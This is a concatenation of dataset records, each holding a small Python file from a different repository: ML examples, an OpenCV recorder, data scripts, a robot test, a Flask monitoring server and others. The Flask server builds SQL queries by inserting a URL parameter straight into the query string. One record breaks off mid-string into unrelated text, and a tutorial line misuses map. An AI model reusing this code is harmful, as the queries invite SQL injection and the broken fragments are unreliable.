asdl.fisher_for_cross_entropy(model, fisher_type, fisher_shape, data_loader=trainloader, seed=1)\n eigvals2 = f.get_eigenvalues(fisher_type, fisher_shape)\n print(f'Top-{top_k} eigenvalues by torch.linalg.eigvalh:')\n print(eigvals2[:top_k].tolist())\n\n\nif __name__ == '__main__':\n if torch.cuda.is_available():\n device = torch.device('cuda')\n else:\n device = torch.device('cpu')\n torch.random.manual_seed(1)\n\n transform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n trainset = torchvision.datasets.CIFAR10(root='./data',\n train=True,\n download=True,\n transform=transform)\n n_examples = 128\n trainset = Subset(trainset, range(n_examples))\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=32,\n shuffle=True, num_workers=4)\n model = Net()\n for i, p in enumerate(model.parameters()):\n if i % 2 == 0:\n p.requires_grad_(False)\n model.to(device)\n main()\n","repo_name":"kazukiosawa/asdl","sub_path":"examples/eigenvalues.py","file_name":"eigenvalues.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"76"} +{"seq_id":"41153650289","text":"import cv2\r\nprint('1')\r\n\r\nimport time\r\ncap = cv2.VideoCapture(0) #cam related\r\nfourcc = cv2.VideoWriter_fourcc(*'XVID') #rec related\r\nout =cv2.VideoWriter('output.avi',fourcc,20.0,(640,480)) #rec related\r\nwhile(cap.isOpened()): #.isOpened used to not run when .videocapture argument is wrong\r\n ret, frame = cap.read() #cam related\r\n if ret==True:\r\n print(cap.get(cv2.CAP_PROP_FRAME_WIDTH)) #cam related\r\n print(cap.get(cv2.CAP_PROP_FRAME_HEIGHT)) #cam related\r\n out.write(frame) #rec related\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) #cam related\r\n cv2.imshow('frame', gray) #cam related\r\n if cv2.waitKey(1) & 0xFF == ord('q') : #to close video\r\n break\r\n else:\r\n break\r\ncap.release() #cam related\r\ncv2.destroyAllWindows()\r\ntime.sleep(1)","repo_name":"vijay-parasuram/image-proccessing","sub_path":"opencv.py","file_name":"opencv.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40794911826","text":"#IN PROGRESS - need to still abstract into functions and add the index creation functionality\n\nimport csv, itertools, string, cPickle\n \nfile = open(\"moviestats_med.csv\")\nreader = csv.reader(file, delimiter = ',', quotechar = '|')\n\ngeneric = [\"and\",\"&\",\"in\",\"the\",\"of\",\"a\"]\n\n#Store the field names in a list\nfor row in itertools.islice(reader, 1):\n fields = row\n\nmovie = {}\nline = []\nindex = {}\n\n#Insert all the rows in the CSV file into a list\nfor i in reader:\n line.append(i)\n\nline_no = 0\n\n#Loop through all of the rows\nwhile line_no < len(line):\n for list in line:\n i = 0\n #Read one movie into curr_movie for processing\n curr_movie = line[line_no]\n for words in curr_movie:\n #Insert the dictionary key and populate with the relevant objects\n for field_name in fields:\n if i < len(fields):\n movie[field_name] = curr_movie[i]\n i+=1\n \n #Concatenate all the keywords (Name and Cast) for this movie into a string to enable splitting\n keywords = movie['name'] + \" \" + movie['actor1'] + \" \" + movie['actor2'] + \" \" + movie['actor3']\n \n #Split the keywords and remove any generic words\n keywords_split = str.split(keywords)\n keywords_split = [t for t in keywords_split if t.lower() not in generic]\n \n 
line_no+=1\n\"\"\"\n # Pickle the individual movie dictionary and store it in a file named after the movie title + year\n movie_name = movie['name']\n for char in string.punctuation:\n movie_name = movie_name.replace(char, ' ')\n #It is assumed that the \"date\" field is when the movie was released; therefore, a re-released movie will have a new date.\n file = open(\"data/\" + movie_name + \" \" + movie['date'] + \".pickle\", \"w\")\n cPickle.dump(movie, file)\n file.close()\n\"\"\"\n","repo_name":"change-agent/PyMDB","sub_path":"create_index/create_index_v2.py","file_name":"create_index_v2.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74628311925","text":"#Escreva um programa que faça o computar \"pensar\" em um número\n#inteiro entre 0 e 5 e peça para o usuário tentar descobrir qual foi\n#o númeor escolhido pelo computador.\n#O programa deverá escrever na tela se o usuário venceo ou perdeu\n\nimport random\n\nrandomNumber = random.randint(0,5)\n\nuserNumber = int(input('Digite seu palpite aqui: '))\n\nif randomNumber == userNumber:\n print('Você ganhou meste!')\nelse:\n print('Você perdeu loser')\n","repo_name":"CezarMontenegro/python-exercises","sub_path":"desafio028.py","file_name":"desafio028.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18753040989","text":"from __future__ import absolute_import\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.image\r\n\r\nimport autograd.numpy as np\r\nimport autograd.numpy.random as npr\r\nimport data_mnist\r\n\r\ndef load_mnist():\r\n partial_flatten = lambda x : np.reshape(x, (x.shape[0], np.prod(x.shape[1:]))) # 定义一个函数,用于将数组进行部分扁平化\r\n one_hot = lambda x, k: np.array(x[:,None] == np.arange(k)[None, :], dtype=int) # 定义一个函数,用于进行one-hot编码\r\n train_images, train_labels, test_images, test_labels = data_mnist.mnist() # 调用data_mnist模块中的mnist函数加载MNIST数据集\r\n train_images = partial_flatten(train_images) / 255.0 # 对训练图像数据进行部分扁平化并归一化\r\n test_images = partial_flatten(test_images) / 255.0 # 对测试图像数据进行部分扁平化并归一化\r\n train_labels = one_hot(train_labels, 10) # 对训练标签进行one-hot编码\r\n test_labels = one_hot(test_labels, 10) # 对测试标签进行one-hot编码\r\n N_data = train_images.shape[0] # 获取训练图像数据的样本数\r\n\r\n return N_data, train_images, train_labels, test_images, test_labels # 返回加载和处理后的数据\r\n\r\n\r\ndef plot_images(images, ax, ims_per_row=5, padding=5, digit_dimensions=(28, 28),\r\n cmap=matplotlib.cm.binary, vmin=None, vmax=None):\r\n \"\"\"图片格式应该设置为(图片数量N_images x 像素pixels)的矩阵.\"\"\"\r\n N_images = images.shape[0] # 获取图像数据的样本数\r\n N_rows = (N_images - 1) // ims_per_row + 1 # 计算需要的行数\r\n pad_value = np.min(images.ravel()) # 获取图像数据中的最小值作为填充值\r\n concat_images = np.full(((digit_dimensions[0] + padding) * N_rows + padding,\r\n (digit_dimensions[1] + padding) * ims_per_row + padding), pad_value) # 创建一个填充值为pad_value的拼接图像\r\n for i in range(N_images):\r\n cur_image = np.reshape(images[i, :], digit_dimensions) # 将一维图像数据转换为二维图像\r\n row_ix = i // ims_per_row # 计算当前图像所在的行索引\r\n col_ix = i % ims_per_row # 计算当前图像所在的列索引\r\n row_start = padding + (padding + digit_dimensions[0]) * row_ix # 计算当前图像在拼接图像中的行起始位置\r\n col_start = padding + (padding + digit_dimensions[1]) * col_ix # 计算当前图像在拼接图像中的列起始位置\r\n concat_images[row_start: row_start + digit_dimensions[0],\r\n col_start: col_start + digit_dimensions[1]] = cur_image # 将当前图像复制到拼接图像中的相应位置\r\n cax = 
ax.matshow(concat_images, cmap=cmap, vmin=vmin, vmax=vmax) # 在指定的Axes对象上绘制拼接图像\r\n plt.xticks(np.array([])) # 设置X轴刻度为空\r\n plt.yticks(np.array([])) # 设置Y轴刻度为空\r\n return cax # 返回图像的Colorbar对象\r\n\r\ndef save_images(images, filename, **kwargs):\r\n fig = plt.figure(1) # 创建一个新的Figure对象\r\n fig.clf() # 清空Figure对象中的所有内容\r\n ax = fig.add_subplot(111) # 在Figure对象上添加一个Axes对象\r\n plot_images(images, ax, **kwargs) # 调用plot_images函数绘制拼接图像\r\n fig.patch.set_visible(False) # 设置Figure对象的背景不可见\r\n ax.patch.set_visible(False) # 设置Axes对象的背景不可见\r\n plt.savefig(filename) # 将Figure对象保存为图像文件\r\n\r\n\r\ndef make_pinwheel(radial_std, tangential_std, num_classes, num_per_class, rate,\r\n rs=npr.RandomState(0)):\r\n rads = np.linspace(0, 2*np.pi, num_classes, endpoint=False) # 在0到2π之间均匀生成num_classes个角度值\r\n\r\n features = rs.randn(num_classes*num_per_class, 2) \\\r\n * np.array([radial_std, tangential_std]) # 生成符合正态分布的特征向量\r\n features[:, 0] += 1 # 对特征向量的第一个维度进行偏移\r\n labels = np.repeat(np.arange(num_classes), num_per_class) # 生成重复的标签\r\n\r\n angles = rads[labels] + rate * np.exp(features[:,0]) # 根据标签和特征计算角度\r\n rotations = np.stack([np.cos(angles), -np.sin(angles), np.sin(angles), np.cos(angles)]) # 构建旋转矩阵\r\n rotations = np.reshape(rotations.T, (-1, 2, 2)) # 调整旋转矩阵的形状\r\n\r\n return np.einsum('ti,tij->tj', features, rotations) # 返回生成的数据\r\n","repo_name":"NPU-IIL/DeepLearningBookWriting","sub_path":"Chapter_07/src/autograd/example/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"71107138805","text":"import uuid\nimport datetime\nimport requests\nfrom common.database import Database\nfrom models.control.control import Control\n\nclass Sale(object):\n def __init__(self, name, period, budget, sales, _id=None):\n self.name=name\n self.period=period\n self.budget=float(budget)\n self.sales=sales\n self._id=uuid.uuid4().hex if _id is None else _id\n\n def __repr__(self):\n return \">>map(lambda x:x*x,[2,6,4,8])\n等价于:\n>>>[x*x for x in [2,6,4,8]]\n如果 map 函数中的函数名或 lambda 表达式为 None,则返回一个列表,列表的每个元素为一个元组,由各个序列相应元素组成,其功能类似内建函数 zip\n'''\na = list(zip([1, 2, 3, 4], [5, 6, 7, 8, 9], [11, 22, 33, 44, 55, 66]))\nprint(a)\nb = map([1, 2, 3, 4], [5, 6, 7, 8, 9], [11, 22, 33, 44, 55, 66])\nprint(b)\n\n'''\n2、filter 函数\nfilter 函数的使用格式为:filter(函数或 lambda 表达式,序列)\n功能:利用函数或 lambda 表达式对序列中的每个元素进行筛选,保留函数值为 True 的元素序列。\n'''\n\n# 筛选出序列中的奇数\ndef odd(n):\n if(n % 2):\n return True\nprint(list(filter(odd, [1, 2, 3, 4, 5, 6])))\n\n'''\n3、reduce 函数\nreduce 函数的使用格式为:reduce(函数或 lambda 表达式,序列[,初始值])\n功能:函数或 lambda 表达式必须是二元函数(两个操作数),如果有初始值,则先把初始值和序列的第一个元素作为函数参数,求得返回值后,\n再将返回值和序列的第二个元素作为函数参数,依此类推,直至序列最后一个元素。如果省略初始值,则先把序列的第一个和第二个元素作为函数参数,求得返回值后,\n再将返回值和序列的第三个元素作为函数参数,依此类推,直至序列最后一个元素。\n注意:Python3.x reduce() 已经被移到 functools 模块里,如果我们要使用,需要引入 functools 模块来调用 reduce() 函数\n'''\n\nfrom functools import reduce\nprint(reduce(lambda x, y : x * y, [1, 2, 3, 4, 5, 6], 10))","repo_name":"jzhangCSER01/LearningPython","sub_path":"22-6-7/chapter04/ch4-14.2.py","file_name":"ch4-14.2.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39309722538","text":"# -*- coding: utf-8 -*-\r\n\r\n# This file is part of EventGhost.\r\n# Copyright (C) 2005 Lars-Peter Voss \r\n#\r\n# EventGhost is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software 
Foundation; either version 2 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# EventGhost is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with EventGhost; if not, write to the Free Software\r\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\r\n#\r\n\r\n\r\nimport eg\r\nimport wx\r\nimport collections\r\nfrom time import strftime, localtime\r\nimport wx.lib.mixins.listctrl as listmix\r\n\r\n\r\nEVENT_ICON = eg.EventItem.icon\r\nERROR_ICON = eg.Icons.ERROR_ICON\r\n\r\n\r\nclass LogCtrl(wx.ListCtrl, listmix.ListCtrlAutoWidthMixin):\r\n \"\"\"Implementation of a ListCtrl with a circular buffer.\"\"\"\r\n\r\n def __init__(self, parent):\r\n self.maxlength = 2000\r\n self.removeOnMax = 200\r\n self.indent = \"\"\r\n self.OnGetItemText = self.OnGetItemTextWithTime\r\n wx.ListCtrl.__init__(\r\n self,\r\n parent,\r\n style=(\r\n wx.LC_REPORT\r\n |wx.LC_VIRTUAL\r\n |wx.NO_FULL_REPAINT_ON_RESIZE\r\n |wx.HSCROLL\r\n |wx.CLIP_CHILDREN\r\n |wx.LC_NO_HEADER\r\n )\r\n )\r\n if eg.config.useFixedFont:\r\n df = self.GetFont()\r\n font = wx.Font(df.GetPointSize(), wx.DEFAULT, wx.NORMAL, wx.NORMAL, False, \"Courier New\")\r\n self.SetFont(font)\r\n listmix.ListCtrlAutoWidthMixin.__init__(self)\r\n self.SetImageList(eg.Icons.gImageList, wx.IMAGE_LIST_SMALL)\r\n\r\n sysColour = eg.colour.windowBackground\r\n sysTextColour = eg.colour.windowText\r\n oddColour = eg.colour.GetOddLogColour()\r\n\r\n self.attr1 = wx.ListItemAttr()\r\n self.attr1.BackgroundColour = oddColour\r\n self.attr1.TextColour = sysTextColour\r\n\r\n self.attr2 = wx.ListItemAttr()\r\n self.attr2.BackgroundColour = sysColour\r\n self.attr2.TextColour = sysTextColour\r\n\r\n self.attr3 = wx.ListItemAttr()\r\n self.attr3.BackgroundColour = oddColour\r\n self.attr3.TextColour = (255, 0, 0)\r\n\r\n self.attr4 = wx.ListItemAttr()\r\n self.attr4.BackgroundColour = sysColour\r\n self.attr4.TextColour = (255, 0, 0)\r\n\r\n self.InsertColumn(0, \"\")\r\n\r\n # logger popup menu\r\n menu = wx.Menu()\r\n menu.Append(wx.ID_COPY, eg.text.MainFrame.Menu.Copy)\r\n self.Bind(wx.EVT_MENU, self.OnCmdCopy, id=wx.ID_COPY)\r\n menu.AppendSeparator()\r\n menuId = wx.NewId()\r\n menu.Append(menuId, eg.text.MainFrame.Menu.ClearLog)\r\n self.Bind(wx.EVT_MENU, self.OnCmdClearLog, id=menuId)\r\n self.contextMenu = menu\r\n\r\n self.Bind(wx.EVT_RIGHT_UP, self.OnRightUp)\r\n self.Bind(wx.EVT_LIST_ITEM_RIGHT_CLICK, self.OnRightUp)\r\n self.Bind(wx.EVT_LIST_BEGIN_DRAG, self.OnStartDrag)\r\n self.Bind(wx.EVT_LEFT_DCLICK, self.OnDoubleClick)\r\n self.Bind(wx.EVT_SET_FOCUS, self.OnSetFocus)\r\n self.Bind(wx.EVT_KILL_FOCUS, self.OnKillFocus)\r\n\r\n self.logTimes = True\r\n self.__inSelection = False\r\n self.isOdd = False\r\n self.data = collections.deque()\r\n eg.log.SetCtrl(self)\r\n self.SetData(eg.log.GetData())\r\n\r\n\r\n @eg.LogIt\r\n def Destroy(self):\r\n eg.log.SetCtrl(None)\r\n\r\n\r\n def OnSetFocus(self, event):\r\n eg.Notify(\"FocusChange\", self)\r\n event.Skip()\r\n\r\n\r\n def OnKillFocus(self, event):\r\n eg.Notify(\"FocusChange\", None)\r\n event.Skip()\r\n\r\n\r\n @eg.AssertNotMainThread\r\n def SetData(self, data):\r\n #self.Freeze()\r\n self.data = collections.deque(data)\r\n self.SetItemCount(len(data))\r\n #self.Thaw()\r\n 
self.ScrollList(0, 1000000)\r\n\r\n\r\n def SetTimeLogging(self, flag):\r\n self.logTimes = flag\r\n if flag:\r\n self.OnGetItemText = self.OnGetItemTextWithTime\r\n else:\r\n self.OnGetItemText = self.OnGetItemTextNormal\r\n self.Refresh()\r\n\r\n\r\n def SetIndent(self, shouldIndent):\r\n if shouldIndent:\r\n self.indent = \" \"\r\n else:\r\n self.indent = \"\"\r\n self.Refresh()\r\n\r\n\r\n def OnStartDrag(self, event):\r\n idx = event.GetIndex()\r\n itemData = self.GetItemData(idx)\r\n if itemData[1] != EVENT_ICON:\r\n return\r\n text = itemData[2]\r\n # create our own data format and use it in a\r\n # custom data object\r\n customData = wx.CustomDataObject(wx.CustomDataFormat(\"DragItem\"))\r\n customData.SetData(text.encode(\"utf-8\"))\r\n\r\n # And finally, create the drop source and begin the drag\r\n # and drop operation\r\n dropSource = wx.DropSource(self)\r\n dropSource.SetData(customData)\r\n result = dropSource.DoDragDrop(wx.Drag_AllowMove)\r\n if result == wx.DragMove:\r\n self.Refresh()\r\n\r\n\r\n def CanCut(self):\r\n return False\r\n\r\n\r\n def CanCopy(self):\r\n return self.GetSelectedItemCount() > 0\r\n\r\n\r\n def CanPaste(self):\r\n return False\r\n\r\n\r\n def Copy(self):\r\n self.OnCmdCopy()\r\n\r\n\r\n def OnCmdCopy(self, dummyEvent=None):\r\n text = \"\"\r\n lines = 1\r\n firstItem = item = self.GetNextItem(\r\n -1,\r\n wx.LIST_NEXT_ALL,\r\n wx.LIST_STATE_SELECTED\r\n )\r\n if item != -1:\r\n text = self.OnGetItemText(item, 0)[1:]\r\n item = self.GetNextItem(\r\n item,\r\n wx.LIST_NEXT_ALL,\r\n wx.LIST_STATE_SELECTED\r\n )\r\n while item != -1:\r\n lines += 1\r\n text += \"\\r\\n\" + self.OnGetItemText(item, 0)[1:]\r\n item = self.GetNextItem(\r\n item,\r\n wx.LIST_NEXT_ALL,\r\n wx.LIST_STATE_SELECTED\r\n )\r\n if text != \"\" and wx.TheClipboard.Open():\r\n textDataObject = wx.TextDataObject(text)\r\n dataObjectComposite = wx.DataObjectComposite()\r\n dataObjectComposite.Add(textDataObject)\r\n if lines == 1:\r\n eventstring, icon = self.GetItemData(firstItem)[:2]\r\n if icon == EVENT_ICON:\r\n customDataObject = wx.CustomDataObject(\"DragEventItem\")\r\n customDataObject.SetData(eventstring.encode(\"UTF-8\"))\r\n dataObjectComposite.Add(customDataObject)\r\n\r\n wx.TheClipboard.SetData(dataObjectComposite)\r\n wx.TheClipboard.Close()\r\n wx.TheClipboard.Flush()\r\n\r\n\r\n def OnCmdClearLog(self, dummyEvent=None):\r\n self.SetItemCount(0)\r\n self.DeleteAllItems()\r\n self.data.clear()\r\n eg.log.data.clear()\r\n self.ScrollList(0, 1000000)\r\n self.Refresh()\r\n\r\n\r\n def OnRightUp(self, dummyEvent):\r\n self.PopupMenu(self.contextMenu)\r\n\r\n\r\n def OnDoubleClick(self, event):\r\n item, flags = self.HitTest(event.GetPosition())\r\n if flags & wx.LIST_HITTEST_ONITEM:\r\n icon, wref = self.GetItemData(item)[1:3]\r\n if icon != eg.EventItem.icon and wref is not None:\r\n obj = wref()\r\n if obj is not None and not obj.isDeleted:\r\n obj.Select()\r\n\r\n\r\n def GetItemData(self, item):\r\n return self.data[item]\r\n\r\n\r\n def OnGetItemText(self, item, column):\r\n return \"\"\r\n\r\n\r\n def OnGetItemTextNormal(self, item, dummyColumn):\r\n line, _, _, _, indent = self.data[item]\r\n return \" \" + indent * self.indent + line\r\n\r\n\r\n def OnGetItemTextWithTime(self, item, dummyColumn):\r\n line, _, _, when, indent = self.data[item]\r\n return (\r\n strftime(\" %X \", localtime(when))\r\n + indent * self.indent\r\n + line\r\n )\r\n\r\n\r\n def OnGetItemAttr(self, item):\r\n if item % 2 == 0:\r\n if self.data[item][1] != ERROR_ICON:\r\n return 
self.attr1\r\n else:\r\n return self.attr3\r\n else:\r\n if self.data[item][1] != ERROR_ICON:\r\n return self.attr2\r\n else:\r\n return self.attr4\r\n\r\n\r\n def OnGetItemImage(self, item):\r\n return self.data[item][1].index\r\n\r\n\r\n @eg.AssertNotMainThread\r\n def WriteLine(self, line, icon, wRef, when, indent):\r\n data = self.data\r\n if len(data) >= self.maxlength:\r\n self.Freeze()\r\n for _ in range(self.removeOnMax):\r\n self.DeleteItem(0)\r\n data.popleft()\r\n self.Thaw()\r\n data.append((line, icon, wRef, when, indent))\r\n self.SetItemCount(len(data))\r\n self.ScrollList(0, 1000000)\r\n self.Update()\r\n\r\n\r\n if eg.debugLevel:\r\n @eg.LogIt\r\n def __del__(self):\r\n pass\r\n\r\n","repo_name":"garbear/EventGhost","sub_path":"eg/Classes/MainFrame/LogCtrl.py","file_name":"LogCtrl.py","file_ext":"py","file_size_in_byte":9254,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"74441270965","text":"from django.urls import path, include\nfrom base.views import user_views as views\n\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n # TokenRefreshView,\n)\n\nurlpatterns = [\n path('login/', views.MyTokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('profile/', views.getUserProfile, name=\"user_profile\"),\n path('register/' , views.registerUser, name=\"register\"),\n]","repo_name":"hoganjameshogan/eshoppe","sub_path":"base/urls/user_urls.py","file_name":"user_urls.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37392357718","text":"#!/usr/bin/python\n\"\"\"Download network datasets required for running the '{analysis}' notebook\nfrom the `Netzschleuder `_ repository.\n\nThe following datasets are downloaded:\n\n#. Zachary Karate Club network (`karate/78`)\n#. Interpersonal contacts among windsurfer (`windsurfers`)\n#. Friendship between students in a residence hall (`residence_hall`)\n#. Combined network of 10 ego-net samples from Facebook (`ego_social/facebook_combined`)\n#. Facebook friendships within several organizations (`facebook_organizations`)\n#. Network of mentions in the Dutch field of literary criticism (`dutch_criticism`)\n#. Trust between physicians in four American cities (`physician_trust`)\n#. Trust network from Epinions.com (`epinions_trust`)\n#. Trust network among users on Advogato platform (`advogato`)\n#. Strongly connected component of Pretty-Good-Privacy (PGP) web of trust (`pgp_strong`)\n#. Interactome network for the PDZ-domian proteins (`interactome_pdz`)\n#. Joshi-Tope human protein interactome (`reactome`)\n#. A network of human proteins and their binding interactions (`interactome_figeys`)\n#. A network of human proteins and their binding interactions (`interactome_stelzl`)\n#. A network of human proteins and their binding interactions (`interactome_vidal`)\n#. Network of protein-protein interactions in Saccharomyces cerevisiae (`interactome_collins`)\n#. A network of protein-protein binding interactions among yeast proteins (`interactome_yeast`)\n#. Gene transcription factor-based regulation, within the bacteria E. coli (`ecoli_transcription`)\n#. 
Gene transcription factor-based regulation, within the yeast (`yeast_transcription`)\n\nDetails information including citation data can be found of pages\ncorresponding to individual datasets\n(for instance `https://networks.skewed.de/net/karate`).\n\"\"\"\nimport graph_tool.all as gt\nfrom src import DATA\nfrom src._ns import Netzschleuder\nfrom src._argparse import get_parser\n\n\ndef get_component(idx: int, *, directed: bool = False):\n \"\"\"Component extraction function factory.\"\"\"\n def component_getter(graph):\n comp = gt.label_components(graph, directed=directed)[0].get_array()\n return gt.GraphView(graph, vfilt=comp == idx).copy()\n return component_getter\n\n\ndef fetch(force: bool = False):\n ns = Netzschleuder(DATA/\"domains\", force=force)\n # Metdata\n friendship = dict(domain=\"social\", relation=\"friendship\")\n recognition = dict(domain=\"social\", relation=\"recognition\")\n trust = dict(domain=\"social\", relation=\"trust\")\n interactome = dict(domain=\"biological\", relation=\"interactome\")\n genetic = dict(domain=\"biological\", relation=\"genetic\")\n # Friendship (offline)\n meta = { **friendship, \"desc\": \"offline\" }\n ns(\"karate\").fetch(network=\"78\", **meta, label=\"Karate\")\n ns(\"windsurfers\").fetch(**meta, label=\"Windsurfers\")\n ns(\"residence_hall\").fetch(**meta, label=\"Residence hall\")\n # Friendship (online)\n meta = { **friendship, \"desc\": \"online\" }\n ns(\"ego_social\").fetch(network=\"facebook_combined\", **meta, label=\"FB (ego-nets)\")\n ns(\"facebook_friends\").fetch(**meta, label=\"FB (Maier)\")\n ns(\"facebook_organizations\").fetch(network=\"S1\", **meta, label=\"FB (S1)\")\n ns(\"facebook_organizations\").fetch(network=\"S2\", **meta, label=\"FB (S2)\")\n ns(\"facebook_organizations\").fetch(network=\"M1\", **meta, label=\"FB (M1)\")\n ns(\"facebook_organizations\").fetch(network=\"M2\", **meta, label=\"FB (M2)\")\n ns(\"facebook_organizations\").fetch(network=\"L1\", **meta, label=\"FB (L1)\")\n ns(\"facebook_organizations\").fetch(network=\"L2\", **meta, label=\"FB (L2)\")\n # Recognition (offline)\n meta = { **recognition, \"desc\": \"offline\" }\n ns(\"dutch_criticism\").fetch(**meta, label=\"Dutch criticism\")\n # Trust (offline)\n meta = { **trust, \"desc\": \"offline\" }\n for i in range(4):\n label = f\"Physicians ({i+1})\"\n ns(\"physician_trust\").fetch(\n postprocess=get_component(i),\n alias=str(i+1),\n label=label,\n **meta\n )\n # Recognition (online)\n meta = { **trust, \"desc\": \"online\" }\n ns(\"epinions_trust\").fetch(**meta, label=\"Epinions\")\n ns(\"advogato\").fetch(**meta, label=\"Advogato\")\n ns(\"pgp_strong\").fetch(**meta, label=\"PGP\")\n # Interactomes (PDZ)\n meta = { **interactome, \"desc\": \"PDZ\" }\n ns(\"interactome_pdz\").fetch(**meta, label=\"PDZ\")\n # Interactomes (Human)\n meta = { **interactome, \"desc\": \"human\" }\n ns(\"reactome\").fetch(**meta, label=\"Reactome\")\n ns(\"interactome_figeys\").fetch(**meta, label=\"Figeys\")\n ns(\"interactome_stelzl\").fetch(**meta, label=\"Stelzl\")\n ns(\"interactome_vidal\").fetch(**meta, label=\"Vidal\")\n # Interactomes (yeast)\n meta = { **interactome, \"desc\": \"yeast\" }\n ns(\"collins_yeast\").fetch(**meta, label=\"Collins\")\n ns(\"interactome_yeast\").fetch(**meta, label=\"Coulomb\")\n # Gene transcription\n meta = { **genetic }\n ns(\"ecoli_transcription\").fetch(network=\"v1.1\", **meta, label=\"E. coli\", desc=\"E. 
coli\")\n    ns(\"yeast_transcription\").fetch(**meta, label=\"Yeast\", desc=\"yeast\")\n\n\nif __name__ == \"__main__\":\n    parser = get_parser(__file__, __doc__)\n    args = parser.parse_args()\n    fetch(args.force)\n","repo_name":"sztal/scs-paper","sub_path":"analyses/1-domains/fetch_networks.py","file_name":"fetch_networks.py","file_ext":"py","file_size_in_byte":5223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72181472246","text":"import qi\nimport time\nfrom naoqi import ALProxy\n\nIP = \"128.237.247.249\"\nPORT = 9559\n\ntts = ALProxy(\"ALTextToSpeech\", IP, int(PORT))\n#tts.say(\"mai hu don\")\n\nsession = qi.Session()\ntry:\n    session.connect('tcp://' + IP + ':' + str(PORT))\nexcept:\n    raise Exception('connect nahi hua')\n\n\nmotion_service = session.service(\"ALMotion\")\nmotion_service.wakeUp()\nmotion_service.moveTo(1.0, -1.0, 0.0)\ntime.sleep(5)\n","repo_name":"kamatajinkya/hri_project","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16177185758","text":"from flask import render_template\nfrom flask import current_app as app\nimport pandas as pd\nfrom viz_server.models import *\n\nfrom viz_server.plots.default.workflow_plots import task_gantt_plot, task_per_app_plot, workflow_dag_plot\nfrom viz_server.plots.default.task_plots import time_series_cpu_per_task_plot, time_series_memory_per_task_plot\nfrom viz_server.plots.default.workflow_resource_plots import resource_distribution_plot, resource_time_series\n\ndummy = True\n\n\n@app.route('/')\ndef index():\n    workflows = Workflow.query.all()\n    for workflow in workflows:\n        workflow.status = 'Running'\n        if workflow.time_completed is not None:\n            workflow.status = 'Completed'\n    return render_template('workflows_summary.html', workflows=workflows)\n\n\n@app.route('/workflow/<workflow_id>/')\ndef workflow(workflow_id):\n    workflow_details = Workflow.query.filter_by(run_id=workflow_id).first()\n\n    if workflow_details is None:\n        return render_template('error.html', message=\"Workflow %s could not be found\" % workflow_id)\n\n#    df_task = pd.read_sql_query(\"\"\"SELECT task.task_id, task.task_func_name, task.task_time_submitted,\n#                                status.timestamp, task.task_time_returned from task, status\n#                                WHERE task.run_id='%s' and status.run_id=task.run_id and\n#                                status.task_status_name='running' and status.task_id=task.task_id\"\"\"\n#                                % (workflow_id), db.engine)\n    df_status = pd.read_sql_query(\n        \"SELECT run_id, task_id, task_status_name, timestamp FROM status WHERE run_id='%s'\" % workflow_id, db.engine)\n    df_task = pd.read_sql_query(\"\"\"SELECT task_id, task_func_name, task_time_submitted,\n                                task_time_returned, task_time_running from task\n                                WHERE run_id='%s'\"\"\"\n                                % (workflow_id), db.engine)\n    task_summary = db.engine.execute(\n        \"SELECT task_func_name, count(*) as 'frequency' from task WHERE run_id='%s' group by task_func_name;\" % workflow_id)\n\n    return render_template('workflow.html',\n                           workflow_details=workflow_details,\n                           task_summary=task_summary,\n                           task_gantt=task_gantt_plot(df_task),\n                           task_per_app=task_per_app_plot(df_task, df_status))\n\n\n@app.route('/workflow/<workflow_id>/app/')\ndef parsl_apps(workflow_id):\n    workflow_details = Workflow.query.filter_by(run_id=workflow_id).first()\n\n    if workflow_details is None:\n        return render_template('error.html', message=\"Workflow %s could not be found\" % workflow_id)\n\n    task_summary = 
